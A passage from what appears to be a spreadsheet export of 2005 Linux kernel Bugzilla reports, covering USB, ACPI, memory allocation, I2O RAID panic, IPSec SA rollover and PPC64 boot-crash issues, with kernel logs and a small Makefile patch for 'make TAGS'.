    <t>Distribution: Gentoo Hardware Environment: ASUS M2400N notebook Software Environment: ? Problem Description: When my USB mouse is plugged in and I insert my USB memory stick in another USB slot, the mouse stops working and needs to be taken out and plugged in again to resume. Steps to reproduce: Insert USB mouse (it works) Insert USB memory device (mouse stops working) Pull out and reinsert mouse (it works again) I never committed a kernel bug before so I don't know what info I should provide. If somethign is needed, just ask and I'll be happy to provide it.</t>
  </si>
  <si>
    <t>Lacie 250Go USB</t>
  </si>
  <si>
    <t>2.6.12-2</t>
  </si>
  <si>
    <t>2005-07-19 23:22 UTC</t>
  </si>
  <si>
    <t>FredericLIETART</t>
  </si>
  <si>
    <t>2005-12-21 16:04 UTC</t>
  </si>
  <si>
    <t>Distribution: Fedora Core 4 Hardware Environment: DD LACIE 250Go USB Software Environment: Linux Problem Description: Hello, When I connect my hard disk LACIE 250Go the core sees it well, but after a few seconds it falls in time out thx Steps to reproduce:</t>
  </si>
  <si>
    <t>Warning: Encountered executable code at module level, [AE_NOT_CONFIGURED]</t>
  </si>
  <si>
    <t>2005-07-21 17:46 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo Hardware Environment: ASUS P4C800E-Deluxe, bios 1.19 Software Environment: Problem Description: CPU0: Thermal monitoring enabled mtrr: v2.0 (20020519) CPU: Intel(R) Pentium(R) 4 CPU 3.00GHz stepping 09 Enabling fast FPU save and restore... done. Enabling unmasked SIMD FPU exception support... done. Checking 'hlt' instruction... OK. ACPI-0498: *** Warning: Encountered executable code at module level, [AE_NOT_CONFIGURED] ACPI-0498: *** Warning: Encountered executable code at module level, [AE_NOT_CONFIGURED] ACPI-0498: *** Warning: Encountered executable code at module level, [AE_NOT_CONFIGURED] ENABLING IO-APIC IRQs ..TIMER: vector=0x31 pin1=2 pin2=-1 NET: Registered protocol family 16 ACPI: bus type pci registered PCI: PCI BIOS revision 2.10 entry at 0xf0031, last bus=3 PCI: Using configuration type 1 ACPI: Subsystem revision 20050408 Steps to reproduce:</t>
  </si>
  <si>
    <t>drivers/ide/Kconfig: no help text for BLK_DEV_GENERIC</t>
  </si>
  <si>
    <t>2.6.13-rc3-mm1</t>
  </si>
  <si>
    <t>2005-07-23 10:19 UTC</t>
  </si>
  <si>
    <t>2011-07-26 19:44 UTC</t>
  </si>
  <si>
    <t>There is no help text for the BLK_DEV_GENERIC option in drivers/ide/Kconfig.</t>
  </si>
  <si>
    <t>System complains "page allocation failure. order:0, mode:0x20" when running test case</t>
  </si>
  <si>
    <t>2005-07-25 00:38 UTC</t>
  </si>
  <si>
    <t>Fang Wenqi</t>
  </si>
  <si>
    <t>2008-09-22 15:45 UTC</t>
  </si>
  <si>
    <t>Distribution: RHEL4 with 2.6.12.1 Hardware Environment: IBM Power5 (IBM,9111-520) Software Environment: Problem Description: System complains "page allocation failure. order:0, mode:0x20" when running test case. Steps to reproduce: 1. Build kernel 2.6.12.1 2. Run test cases (networktest + iozone + memtest) 3. After running for about 3 hours, system reports"swapper: page allocation failure. order:0, mode:0x20". Additional information: 1. System is available and the test cases are running. 2. Get following call trace in /var/log/messages: ========================================================= Jul 22 19:51:06 csdlsf2 kernel: swapper: page allocation failure. order:0, mode:0x20 Jul 22 19:51:06 csdlsf2 kernel: Call Trace: Jul 22 19:51:06 csdlsf2 kernel: [c00000000ffef480] [c0000000000952e8] .__alloc_pages+0x550/0x5a4 (unreliable) Jul 22 19:51:06 csdlsf2 kernel: [c00000000ffef560] [c0000000000b4650] .alloc_pages_current+0x74/0xe0 Jul 22 19:51:06 csdlsf2 kernel: [c00000000ffef5f0] [c000000000099398] .cache_grow+0x130/0x4d4 Jul 22 19:51:06 csdlsf2 kernel: [c00000000ffef6b0] [c000000000099a2c] .cache_alloc_refill+0x2f0/0x324 Jul 22 19:51:06 csdlsf2 kernel: [c00000000ffef760] [c000000000099264] .kmem_cache_alloc+0xbc/0xc0 Jul 22 19:51:06 csdlsf2 kernel: [c00000000ffef7f0] [c00000000027dea8] .dst_alloc+0x50/0x108 Jul 22 19:51:06 csdlsf2 kernel: [c00000000ffef880] [c00000000029d4e0] .ip_route_input+0x560/0xe34 Jul 22 19:51:06 csdlsf2 kernel: [c00000000ffefa60] [c0000000002a1564] .ip_rcv+0x59c/0x6cc Jul 22 19:51:09 csdlsf2 kernel: [c00000000ffefb00] [c000000000278b74] .netif_receive_skb+0x3e8/0x4a0 Jul 22 19:51:19 csdlsf2 kernel: [c00000000ffefbb0] [d0000000002a374c] .e1000_clean_rx_irq+0xf4/0x678 [e1000] Jul 22 19:51:28 csdlsf2 kernel: [c00000000ffefcd0] [d0000000002a30a8] .e1000_clean+0x590/0xb40 [e1000] Jul 22 19:51:36 csdlsf2 kernel: [c00000000ffefe10] [c000000000278fa4] .net_rx_action+0xfc/0x2bc Jul 22 19:51:43 csdlsf2 kernel: [c00000000ffefed0] [c0000000000644c0] .__do_softirq+0xcc/0x1a0 Jul 22 19:51:47 csdlsf2 kernel: [c00000000ffeff90] [c0000000000143f0] .call_do_softirq+0x14/0x24 Jul 22 19:51:49 csdlsf2 kernel: [c00000000778b920] [c00000000000fd70] .do_softirq+0x90/0xa4 Jul 22 19:51:50 csdlsf2 kernel: [c00000000778b9b0] [c0000000000646a0] .irq_exit+0x6c/0x84 Jul 22 19:51:54 csdlsf2 kernel: [c00000000778ba30] [c00000000000f99c] .do_IRQ+0x88/0xe4 Jul 22 19:51:56 csdlsf2 kernel: [c00000000778bab0] [c00000000000ae34] hardware_interrupt_entry+0x8/0x54 Jul 22 19:51:57 csdlsf2 kernel: --- Exception: 501 at .dedicated_idle+0x114/0x270 Jul 22 19:51:58 csdlsf2 kernel: LR = .dedicated_idle+0x1cc/0x270 Jul 22 19:51:59 csdlsf2 kernel: [c00000000778be90] [c000000000010348] .cpu_idle+0x38/0x4c Jul 22 19:52:01 csdlsf2 kernel: [c00000000778bf00] [c00000000003b254] .start_secondary+0x108/0x144 Jul 22 19:52:02 csdlsf2 kernel: [c00000000778bf90] [c00000000000bd84] .enable_64b_mode+0x0/0x28 ========================================================= 3. memory usage is high. kbmemfree kbmemused %memused kbbuffers kbcached kbswpfree kbswpused %swpused kbswpcad 07:20:08 PM 460556 1410788 75.39 1636 281868 1975948 72028 3.52 25064 07:30:10 PM 8404 1862940 99.55 1732 737132 1975944 72032 3.52 23784 07:40:09 PM 7776 1863568 99.58 1392 737408 1975944 72032 3.52 23848 07:50:02 PM 7768 1863576 99.58 2496 728824 1975944 72032 3.52 24104 08:00:06 PM 5720 1865624 99.69 1784 718660 1975944 72032 3.52 25176 08:10:13 PM 7984 1863360 99.57 832 736900 1975980 71996 3.52 24400 08:20:12 PM 8372 1862972 99.55 1416 721036 1975984 71992 3.52 23684 08:31:05 PM 7148 1864196 99.62 1408 735204 1975984 71992 3.52 25004 08:40:06 PM 8200 1863144 99.56 756 711608 1975984 71992 3.52 33256 08:50:02 PM 7944 1863400 99.58 2780 709236 1992332 55644 2.72 17092 09:00:02 PM 512524 1358820 72.61 37672 183940 2008812 39164 1.91 784 09:10:01 PM 7652 1863692 99.59 32356 688548 2008812 39164 1.91 2012</t>
  </si>
  <si>
    <t>Repeatable Kernel Panic on Adaptec 2015S I20 device on bootup</t>
  </si>
  <si>
    <t>2.6.12.3</t>
  </si>
  <si>
    <t>2005-07-25 14:13 UTC</t>
  </si>
  <si>
    <t>Joshua McClintock</t>
  </si>
  <si>
    <t>2006-01-13 10:56 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian (custom kernel - source from kernel.org) Hardware Environment: Dual board, single Xeon 2.6 proc Software Environment: Problem Description: Kernel panic on every bootup Steps to reproduce: Boot machine Here is the Kernel output: Linux version 2.6.12.3 (root@graviton.krk0) (gcc version 3.3.5 (Debian 1:3.3.5- )) #2 SMP Fri Jul 22 14:52:48 PDT 2005 BIOS-provided physical RAM map: BIOS-e820: 0000000000000000 - 000000000009e400 (usable) BIOS-e820: 000000000009e400 - 00000000000a0000 (reserved) BIOS-e820: 00000000000e0000 - 0000000000100000 (reserved) BIOS-e820: 0000000000100000 - 000000001fef0000 (usable) BIOS-e820: 000000001fef0000 - 000000001fef8000 (ACPI data) BIOS-e820: 000000001fef8000 - 000000001ff00000 (ACPI NVS) BIOS-e820: 000000001ff00000 - 000000001ff80000 (usable) BIOS-e820: 000000001ff80000 - 0000000 BIOS-e820: 00000000fec00000 - 00000000fec10000 (reserved) BIOS-e820: 00000000fee00000 - 00000000fee01000 (reserved) BIOS-e820: 00000000ff800000 - 00000000ffc00000 (reserved) BIOS-e820: 00000000fff00000 - 0000000100000000 (reserved) 0MB HIGHMEM available. 511MB LOWMEM available. found SMP MP-table at 000f6ca0 DMI present. Intel MultiProcessor Specification v1.4 Virtual Wire compatibility mode. OEM ID: Product ID: Kings Canyon APIC at: 0xFEE00000 Processor #0 15:2 APIC version 20 Processor #1 15:2 APIC ve I/O APIC #2 Version 32 at 0xFEC00000. I/O APIC #3 Version 32 at 0xFEC80000. I/O APIC #4 Version 32 at 0xFEC80400. Enabling APIC mode: Flat. Using 3 I/O APICs Processors: 2 Allocating PCI resources starting at 20000000 (gap: 20000000:dec00000) Built 1 zonelists Kernel command line: vga=normal initrd=/install/initrd.gz ramdisk_size=10240 roo t=/dev/ram0 devfs=mount,dall rw -- BOOT_IMAGE=/install/vmlinuz console=ttyS0,576 00 Initializing CPU#0 PID hash table entries: 2048 (order: 11, 32768 bytes) Detected 2399.779 Using tsc for high-res timesource Console: colour VGA+ 80x25 Dentry cache hash table entries: 131072 (order: 7, 524288 bytes) Inode-cache hash table entries: 65536 (order: 6, 262144 bytes) Memory: 505948k/523776k available (4467k kernel code, 17108k reserved, 2100k dat a, 296k init, 0k highmem) Checking if this processor honours the WP bit even in supervisor mode... Ok. Security Framework v1.0.0 initialized Capability LSM initialized Mount-cache hash table entries: 512 CPU: Trace cache: 12K uops, L1 D cache: 8K CPU: L2 cache: 512K CPU: Physical Processor ID: 0 Enabling fast FPU save and restore... done. Enabling unmasked SIMD FPU exception support... done. Checking 'hlt' instruction... OK. Checking for popad bug... OK. CPU0: Intel(R) Xeon(TM) CPU 2.40GHz stepping 05 Booting processor 1/1 eip 2000 Initializing CPU#1 CPU: Trace cache: 12K uops, L1 D cache: 8K CPU: L2 cache: 512K CPU: Physical Processor ID: 0 CPU1: Intel(R) Xeon(TM) CPU 2.40GHz stepping 05 Total of 2 processors activated (9519.10 BogoMIPS). ENABLING IO-APIC ..TIMER: vector=0x31 pin1=2 pin2=0 checking TSC synchronization across 2 CPUs: passed. Brought up 2 CPUs checking if image is initramfs...it isn't (no cpio magic); looks like an initrd Freeing initrd memory: 3874k freed NET: Registered protocol family 16 PCI: PCI BIOS revision 2.10 entry at 0xfd8c5, last bus=4 PCI: Using configuration type 1 mtrr: v2.0 (20020519) Linux Plug and Play Support v0.97 (c) Adam Belay SCSI subsystem initialized usbcore: registered new driver usbfs usbcore: registered new driver hub PCI: Probing PCI hardware PCI: Probing PCI hardware (bus 00) PCI: Ignoring BAR0-3 of IDE controller 0000:00:1f.1 PCI: Transparent bridge - 0000:00:1e.0 PCI: Discovered primary peer bus 10 [IRQ] PCI: Discovered primary peer bus 11 [IRQ] PCI: Discovered primary peer bus 12 [IRQ] PCI: Using IRQ router PIIX/ICH [8086/2480] at 0000:00:1f.0 PCI-&gt;APIC IRQ transform: 0000:00:1d.0[A] -&gt; IRQ 16 PCI-&gt;APIC IRQ transform: 0000:00:1d.1[B] -&gt; IRQ 19 PCI-&gt;APIC IRQ transform: 0000:00:1d.2[C] -&gt; IRQ 18 PCI-&gt;APIC IRQ transform: 000 PCI-&gt;APIC IRQ transform: 0000:02:03.1[B] -&gt; IRQ 55 PCI-&gt;APIC IRQ transform: 0000:03:03.0[A] -&gt; IRQ 30 PCI-&gt;APIC IRQ transform: 0000:04:01.0[A] -&gt; IRQ 16 apm: BIOS not found. VFS: Disk quotas dquot_6.5.1 Dquot-cache hash table entries: 1024 (order 0, 4096 bytes) devfs: 2004-01-31 Richard Gooch (rgooch@atnf.csiro.au) devfs: boot_options: 0x1 Installing knfsd (copyright (C) 1996 okir@monad.swb.de). NTFS driver 2.1.22 [Flags: R/W]. SGI XFS with ACLs, security attributes, large block numbers, no debug enabled SGI XFS Quota Management subsystem Initializing Cryptographic API vga16fb: mapped to 0xc00a0000 fb0: VGA16 VGA frame buffer device isapnp: Scanning for PnP cards... isapnp: No Plug &amp; Play device found lp: driver loaded but no devices found Real Time Clock Driver v1.12 hw_random hardware driver 1.0.0 loaded Linux agpgart interface v0.101 (c) Dave Jones [drm] Initialized drm 1.0.0 20040925 ipmi message handler version v33 ipmi device interface version v33 IPMI System Interface driver version v33, KCS version v33, SM version v33 ipmi_si: Trying "kcs" at I/O port 0xca2 ipmi_si: Trying "smic" at I/O port 0xca9 ipmi_si: Trying "bt" at I/O port 0xe4 ipmi_si: Unable to find any System Interface(s) IPMI Watchdog: driver version v33 Copyright (C) 2004 MontaVista Software - IPMI Powerdown via sys_reboot version v 33. intelfb: Framebuffer driver for Intel(R) 830M/845G/852GM/855GM/865G/915G chipset s intelfb: Version 0.9.2 PNP: No PS/2 controller found. Probing ports directly. serio: i8042 AUX port at 0x60,0x64 irq 12 serio: i8042 KBD port at 0x60,0x64 irq 1 Serial: 8250/16550 driver $Revision: 1.90 $ 8 ports, IRQ sharing disabled ttyS0 at I/O 0x3f8 (irq = 4) is a 16550A ttyS1 at I/O 0x2f8 (irq = 3) is a 16550A io scheduler noop registered io scheduler anticipatory registered io scheduler deadline registered io scheduler cfq registered Floppy drive(s): fd0 is 1.44M FDC 0 is a post-1991 82077 RAMDISK driver initialized: 16 RAM disks of 10240K size 1024 blocksize loop: loaded (max 8 devices) pktcdvd: v0.2.0a 2004-07-14 Jens Axboe (axboe@suse.de) and petero2@telia.com Intel(R) PRO/1000 Network Driver - version 6.0.54-k2 Copyright (c) 1999-2004 Intel Corporation. e1000: eth0: e1000_probe: Intel(R) PRO/1000 Network Connection e1000: eth1: e1000_probe: Intel(R) PRO/1000 Network Connection e100: Intel(R) PRO/100 Network Driver, 3.4.8-k2-NAPI e100: Copyright(c) 1999-2005 Intel Corporation PPP generic driver version 2.4.2 PPP Deflate Compression module registered PPP BSD Compression module registered NET: Registered protocol family 24 tun: Universal TUN/TAP device driver, 1.6 tun: (C) 1999-2004 Max Krasnyansky &lt;maxk@qualcomm.com&gt; Cronyx Ltd, Synchronous PPP and CISCO HDLC (c) 1994 Linux port (c) 1998 Building Number Three Ltd &amp; Jan "Yenya" Kasprzak. DLCI driver v0.35, 4 Jan 1997, mike.mclagan@linux.org. HDLC support module revision 1.17 Uniform Multi-Platform E-IDE driver Revision: 7.00alpha2 ide: Assuming 33MHz system bus speed for PIO modes; override with idebus=xx ICH3: IDE controller at PCI slot 0000:00: ICH3: chipset revision 2 ICH3: not 100% native mode: will probe irqs later ide0: BM-DMA at 0x2060-0x2067, BIOS settings: hda:pio, hdb:pio ide1: BM-DMA at 0x2068-0x206f, BIOS settings: hdc:pio, hdd:pio hdc: CD-224E, ATAPI CD/DVD-ROM drive ide1 at 0x170-0x177,0x376 on irq 15 hdc: ATAPI 24X CD-ROM drive, 128kB Cache, UDMA(33) Uniform CD-ROM driver Revision: 3.20 Loading Adaptec I2O RAID: Version 2.4 Build 5go Detecting Adaptec I2O RAID controllers... Adaptec I2O RAID controller 0 irq=30 BAR0 e0900000 - BAR1 e0a80000 - size= 1000000 dpti: If you have a lot of devices this could take a few minutes. dpti0: Reading the hardware resource table. TID 008 Vendor: ADAPTEC Device: AIC-7902 Rev: 00000001 TID 009 Vendor: ADAPTEC Device: AIC-7902 Rev: 00000001 TID 513 Vendor: SUPER G Device: GEM318 Rev: 0 0 scsi0 : Vendor: Adaptec Model: 2015S FW:3B0A Vendor: SUPER Model: GEM318 Rev: 0 Type: Processor ANSI SCSI revision: 02 megaraid cmm: 2.20.2.5 (Release Date: Fri Jan 21 00:01:03 EST 2005) megaraid: 2.20.4.5 (Release Date: Thu Feb 03 12:27:22 EST 2005) 3ware Storage Controller device driver for Linux v1.26.02.001. 3ware 9000 Storage Controller device driver for Linux v2.26.02.002. Attached scsi generic sg0 at scsi0, channel 0, id 6, lun 0, type 3 I2O subsystem v$Rev$ i2o: max drivers = 8 i2o: Checking for PCI I2O controllers... i2o: I2O controller found on bus 3 at 24. iop0: PCI I2O controller BAR0 at 0xF8300000 size=1048576 BAR1 at 0xFB000000 size=16777216 iop0: using write combining MTRR iop0: Installed at IRQ 30 iop0: Activating I2O controller... iop0: This may take a few minutes if there are many devices Unable to handle kernel paging request at virtual address 8000002c printing eip: c03f1037 *pde = 00000000 Oops: 0000 [#1] SMP Modules linked in: CPU: 0 EIP: 0060:[&lt;c03f1037&gt;] Not tainted VLI EFLAGS: 00010086 (2.6.12.3) EIP is at adpt_isr+0x12f/0x1f8 eax: 80000000 ebx: dfcd0000 ecx: c17e0000 edx: c17e0000 esi: c17e0000 edi: 00000000 ebp: 1fcd0000 esp: c076df48 ds: 007b es: 007b ss: 0068 Process swapper (pid: 0, threadinfo=c076c000 task=c0673bc0) Stack: 00000000 00000286 00000000 dfc48ec0 00000000 c076dfac 0000001e c01358ff 0000001e c17e0000 c076dfac 00000000 0000001e c07687b0 000003c0 c07687cc c01359f5 dfc48ec0 c076dfac ffffe000 c076c000 c07b4380 c07b4300 c0104dd5 Call Trace: [&lt;c01358ff&gt;] handle_IRQ_event+0x23/0x58 [&lt;c01359f5&gt;] __do_IRQ+0xc1/0x10c [&lt;c0104dd5&gt;] do_IRQ+0x19/0x24 [&lt;c01037d2&gt;] common_interrupt+0x1a/0x20 [&lt;c01009e0&gt;] default_idle+0x0/0x2c [&lt;c0100a03&gt;] default_idle+0x23/0x2c [&lt;c0100aa2&gt;] cpu_idle+0x62/0x74 [&lt;c076e81b&gt;] start_kernel+0x17f/0x1b4 Code: 00 00 00 40 89 44 24 08 74 12 8b 7b 0c 85 ff 74 0b b9 11 00 00 00 89 de f3 a5 89 f6 8b 7c 24 08 85 ff 78 34 8b 43 0c 85 c0 74 07 &lt;8b&gt; 70 2c 85 f6 75 1a 8b 54 24 24 8b 82 88 00 00 00 89 28 0f ae &lt;0&gt;Kernel panic - not syncing: Fatal exception in interrupt</t>
  </si>
  <si>
    <t>Thinkpad ACPI needs update</t>
  </si>
  <si>
    <t>2005-07-27 01:45 UTC</t>
  </si>
  <si>
    <t>Johannes Hansen</t>
  </si>
  <si>
    <t>2010-10-08 18:17 UTC</t>
  </si>
  <si>
    <t>Borislav Deianov</t>
  </si>
  <si>
    <t>Current IBM-ACPI in kernel is version 0.8. http://ibm-acpi.sf.net has a stable version 0.11 Version 0.8 lacks support for importent hardware sensors, fan control docking/undocking. Much is fixed in version 0.11. Please upgrade!</t>
  </si>
  <si>
    <t>IPSec incompabilty. Linux kernel waits to long to start using new SA for outbound traffic.</t>
  </si>
  <si>
    <t>2005-07-27 14:31 UTC</t>
  </si>
  <si>
    <t>2006-01-30 16:33 UTC</t>
  </si>
  <si>
    <t>Problem Description: Linux kernel waits to long to start using new SA for outbound traffic. This is wrong, and creates real problems when peer stops supporting old SA faster than it should. Steps to reproduce: I started pinging over IPSec tunnel. Racoon created the pair of IPsec-SA: Jul 27 21:18:06 gw1 racoon: INFO: IPsec-SA established: ESP/Tunnel YYY.YY.YYY.YYY[0]-&gt;XXX.XX.XX.XXX[0] spi=209244 158(0xc78cffe) Jul 27 21:18:06 gw1 racoon: INFO: IPsec-SA established: ESP/Tunnel XXX.XX.XX.XXX[0]-&gt;YYY.YY.YYY.YYY[0] spi=282443 5949(0xa85978ed) Everything worked fine: 2005-07-27 21:18:24.451903 IP XXX.XX.XX.XXX &gt; YYY.YY.YYY.YYY: ESP(spi=0xa85978ed,seq=0x1), length 116 2005-07-27 21:18:24.486625 IP YYY.YY.YYY.YYY &gt; XXX.XX.XX.XXX: ESP(spi=0x0c78cffe,seq=0x1), length 116 2005-07-27 21:18:25.453360 IP XXX.XX.XX.XXX &gt; YYY.YY.YYY.YYY: ESP(spi=0xa85978ed,seq=0x2), length 116 2005-07-27 21:18:25.482251 IP YYY.YY.YYY.YYY &gt; XXX.XX.XX.XXX: ESP(spi=0x0c78cffe,seq=0x2), length 116 After ~2880s keys expired: Jul 27 22:06:06 gw1 racoon: INFO: IPsec-SA expired: ESP/Tunnel YYY.YY.YYY.YYY[0]-&gt;XXX.XX.XX.XXX[0] spi=209244158( 0xc78cffe) Jul 27 22:06:06 gw1 racoon: INFO: initiate new phase 2 negotiation: XXX.XX.XX.XXX[0]&lt;=&gt;YYY.YY.YYY.YYY[0] Jul 27 22:06:06 gw1 racoon: INFO: IPsec-SA expired: ESP/Tunnel XXX.XX.XX.XXX[0]-&gt;YYY.YY.YYY.YYY[0] spi=2824435949 (0xa85978ed) Racoon negotiated new SA: Jul 27 22:06:10 gw1 racoon: INFO: IPsec-SA established: ESP/Tunnel YYY.YY.YYY.YYY[0]-&gt;XXX.XX.XX.XXX[0] spi=150510 678(0x8f89c56) Jul 27 22:06:10 gw1 racoon: INFO: IPsec-SA established: ESP/Tunnel XXX.XX.XX.XXX[0]-&gt;YYY.YY.YYY.YYY[0] spi=360860 9595(0xd717033b) Linux kernel was still using old SA (spi=0xa85978ed), peer switched into new SA (spi=0x08f89c56) 2005-07-27 22:06:10.634929 IP XXX.XX.XX.XXX &gt; YYY.YY.YYY.YYY: ESP(spi=0xa85978ed,seq=0xb2c), length 116 2005-07-27 22:06:10.987012 IP YYY.YY.YYY.YYY &gt; XXX.XX.XX.XXX: ESP(spi=0x0c78cffe,seq=0xb28), length 116 2005-07-27 22:06:10.992134 IP YYY.YY.YYY.YYY &gt; XXX.XX.XX.XXX: ESP(spi=0x0c78cffe,seq=0xb29), length 116 2005-07-27 22:06:10.997382 IP YYY.YY.YYY.YYY &gt; XXX.XX.XX.XXX: ESP(spi=0x0c78cffe,seq=0xb2a), length 116 2005-07-27 22:06:11.636814 IP XXX.XX.XX.XXX &gt; YYY.YY.YYY.YYY: ESP(spi=0xa85978ed,seq=0xb2d), length 116 2005-07-27 22:06:11.665220 IP YYY.YY.YYY.YYY &gt; XXX.XX.XX.XXX: ESP(spi=0x0c78cffe,seq=0xb2b), length 116 2005-07-27 22:06:12.638681 IP XXX.XX.XX.XXX &gt; YYY.YY.YYY.YYY: ESP(spi=0xa85978ed,seq=0xb2e), length 116 2005-07-27 22:06:12.666848 IP YYY.YY.YYY.YYY &gt; XXX.XX.XX.XXX: ESP(spi=0x08f89c56,seq=0x1), length 116 2005-07-27 22:06:13.640549 IP XXX.XX.XX.XXX &gt; YYY.YY.YYY.YYY: ESP(spi=0xa85978ed,seq=0xb2f), length 116 2005-07-27 22:06:13.673727 IP YYY.YY.YYY.YYY &gt; XXX.XX.XX.XXX: ESP(spi=0x08f89c56,seq=0x2), length 116 2005-07-27 22:06:14.642430 IP XXX.XX.XX.XXX &gt; YYY.YY.YYY.YYY: ESP(spi=0xa85978ed,seq=0xb30), length 116 2005-07-27 22:06:14.670360 IP YYY.YY.YYY.YYY &gt; XXX.XX.XX.XXX: ESP(spi=0x08f89c56,seq=0x3), length 116 2005-07-27 22:06:15.643304 IP XXX.XX.XX.XXX &gt; YYY.YY.YYY.YYY: ESP(spi=0xa85978ed,seq=0xb31), length 116 2005-07-27 22:06:15.670616 IP YYY.YY.YYY.YYY &gt; XXX.XX.XX.XXX: ESP(spi=0x08f89c56,seq=0x4), length 116 IPSec peer initiated new key renegotiation: Jul 27 22:06:52 gw1 racoon: INFO: respond new phase 1 negotiation: XXX.XX.XX.XXX[500]&lt;=&gt;YYY.YY.YYY.YYY[500] Jul 27 22:06:52 gw1 racoon: INFO: begin Identity Protection mode. Jul 27 22:06:58 gw1 racoon: INFO: ISAKMP-SA established XXX.XX.XX.XXX[500]-YYY.YY.YYY.YYY[500] spi:aa103d22d3e480 b3:1b470506cfc95a33 Jul 27 22:07:02 gw1 racoon: INFO: IPsec-SA established: ESP/Tunnel YYY.YY.YYY.YYY[0]-&gt;XXX.XX.XX.XXX[0] spi=383529 4(0x3a859e) Jul 27 22:07:02 gw1 racoon: INFO: IPsec-SA established: ESP/Tunnel XXX.XX.XX.XXX[0]-&gt;YYY.YY.YYY.YYY[0] spi=299727 8258(0xb2a6d632) Linux was still using old SA(spi=0xa85978ed), peer stopped accepting this SA: 2005-07-27 22:07:03.691323 IP XXX.XX.XX.XXX &gt; YYY.YY.YYY.YYY: ESP(spi=0xa85978ed,seq=0xb61), length 116 2005-07-27 22:07:03.718660 IP YYY.YY.YYY.YYY &gt; XXX.XX.XX.XXX: ESP(spi=0x08f89c56,seq=0x34), length 116 2005-07-27 22:07:04.692194 IP XXX.XX.XX.XXX &gt; YYY.YY.YYY.YYY: ESP(spi=0xa85978ed,seq=0xb62), length 116 2005-07-27 22:07:05.692064 IP XXX.XX.XX.XXX &gt; YYY.YY.YYY.YYY: ESP(spi=0xa85978ed,seq=0xb63), length 116 2005-07-27 22:07:06.691950 IP XXX.XX.XX.XXX &gt; YYY.YY.YYY.YYY: ESP(spi=0xa85978ed,seq=0xb64), length 116 2005-07-27 22:07:07.691825 IP XXX.XX.XX.XXX &gt; YYY.YY.YYY.YYY: ESP(spi=0xa85978ed,seq=0xb65), length 116 After 5 minutes linux kernel started using newest SA, ping started working again: 05-07-27 22:12:10.697040 IP XXX.XX.XX.XXX &gt; YYY.YY.YYY.YYY: ESP(spi=0xa85978ed,seq=0xc94), length 116 2005-07-27 22:12:11.697012 IP XXX.XX.XX.XXX &gt; YYY.YY.YYY.YYY: ESP(spi=0xb2a6d632,seq=0x1), length 116 2005-07-27 22:12:11.724977 IP YYY.YY.YYY.YYY &gt; XXX.XX.XX.XXX: ESP(spi=0x003a859e,seq=0x1), length 116 2005-07-27 22:12:12.697803 IP XXX.XX.XX.XXX &gt; YYY.YY.YYY.YYY: ESP(spi=0xb2a6d632,seq=0x2), length 116 2005-07-27 22:12:12.726600 IP YYY.YY.YYY.YYY &gt; XXX.XX.XX.XXX: ESP(spi=0x003a859e,seq=0x2), length 116</t>
  </si>
  <si>
    <t>/proc/acpi/toshiba entries missing in ACPI20050708 ?</t>
  </si>
  <si>
    <t>2.6.12.3, 2.6.13-rc4, 2.6.13-rc6</t>
  </si>
  <si>
    <t>2005-07-27 17:13 UTC</t>
  </si>
  <si>
    <t>4539 4902 5066</t>
  </si>
  <si>
    <t>Distribution: Slackware 10.1 Hardware Environment: Toshiba Satellite Pro 6000 Software Environment: Problem Description: /proc/acpi/toshiba entries are not created with by kernel 2.6.12.3 with ACPI20050708. Hence it is no longer possible to get/set Toshiba specific settings. Plain kernel 2.6.12.2 is fine however. Steps to reproduce: boot with 2.6.12.3 patched with ACPI20050708. Notice that /proc/acpi/toshiba is not there.</t>
  </si>
  <si>
    <t>Correct the memset arguments in processor_idle.c</t>
  </si>
  <si>
    <t>2005-07-27 18:14 UTC</t>
  </si>
  <si>
    <t>2005-08-03 21:35 UTC</t>
  </si>
  <si>
    <t>Two memsets in processor_idle.c have wrong arguments. Correct it.</t>
  </si>
  <si>
    <t>make TAGS does not make source code tags for emacs. It instead returns an error than "etags -" isn't valid. The problem is easily remedied. It is a problem with the main Makefile. Just search for "etags".</t>
  </si>
  <si>
    <t>2005-07-27 18:51 UTC</t>
  </si>
  <si>
    <t>Jeremy Bongio</t>
  </si>
  <si>
    <t>Here's a patch for it, if possible I'd appreciate an email saying if this patch was satisfactory or not. --- linux/Makefile 2005-07-27 21:19:38.000000000 -0400 +++ linux-2.6/Makefile 2005-07-27 21:41:17.000000000 -0400 @@ -1187,7 +1187,11 @@ cscope: FORCE $(call cmd,cscope) quiet_cmd_TAGS = MAKE $@ -cmd_TAGS = $(all-sources) | etags - +define cmd_TAGS + rm -f $@; \ + ETAGSF=`etags --version | grep -i exuberant &gt;/dev/null &amp;&amp; echo "-I __initdata,__exitdata,EXPORT_SYMBOL,EXPORT_SYMBOL_GPL --extra=+f"`; \ + $(all-sources) | xargs etags $$ETAGSF -a +endef # Exuberant ctags works better with -I</t>
  </si>
  <si>
    <t>Crashes on boot, networking?</t>
  </si>
  <si>
    <t>2.6.13-rc3-mm2</t>
  </si>
  <si>
    <t>2005-07-28 08:03 UTC</t>
  </si>
  <si>
    <t>2005-07-28 23:03 UTC</t>
  </si>
  <si>
    <t>Seems to have some odd problem on PPC64 - crashes on boot. Seems to affect power 4 boxes, both LPAR and bare metal. raid5: using function: 32regs (4524.000 MB/sec) md: md driver 0.90.2 MAX_MD_DEVS=256, MD_SB_DISKS=27 md: bitmap version 3.38 oprofile: using ppc64/power4 performance monitoring. NET: Registered protocol family 2 IP route cache hash table entries: 2097152 (order: 12, 16777216 bytes) Badness in nr_blockdev_pages at fs/block_dev.c:399 Call Trace: [c0000003fffafbd0] [000000000000000a] -- 0: that's all I get. full log is here: http://ftp.kernel.org/pub/linux/kernel/people/mbligh/abat/9278/debug/console.log Oooh, this one has more info: http://ftp.kernel.org/pub/linux/kernel/people/mbligh/abat/9276/debug/console.log Something networky? Tail end is here: raid5: using function: 32regs (5452.000 MB/sec) md: md driver 0.90.2 MAX_MD_DEVS=256, MD_SB_DISKS=27 md: bitmap version 3.38 oprofile: using ppc64/power4 performance monitoring. NET: Registered protocol family 2 IP route cache hash table entries: 1048576 (order: 11, 8388608 bytes) Badness in nr_blockdev_pages at fs/block_dev.c:399 Call Trace: [c00000003ffd3bd0] [000000000000000a] 0xa (unreliable) [c00000003ffd3c50] [c000000000079ec8] .si_meminfo+0x40/0x7c [c00000003ffd3ce0] [c0000000004fc0e8] .inet_initpeers+0x24/0x114 [c00000003ffd3de0] [c0000000004fc1f0] .ip_init+0x18/0x34 [c00000003ffd3e60] [c0000000004fcba4] .inet_init+0x14c/0x4a8 [c00000003ffd3f00] 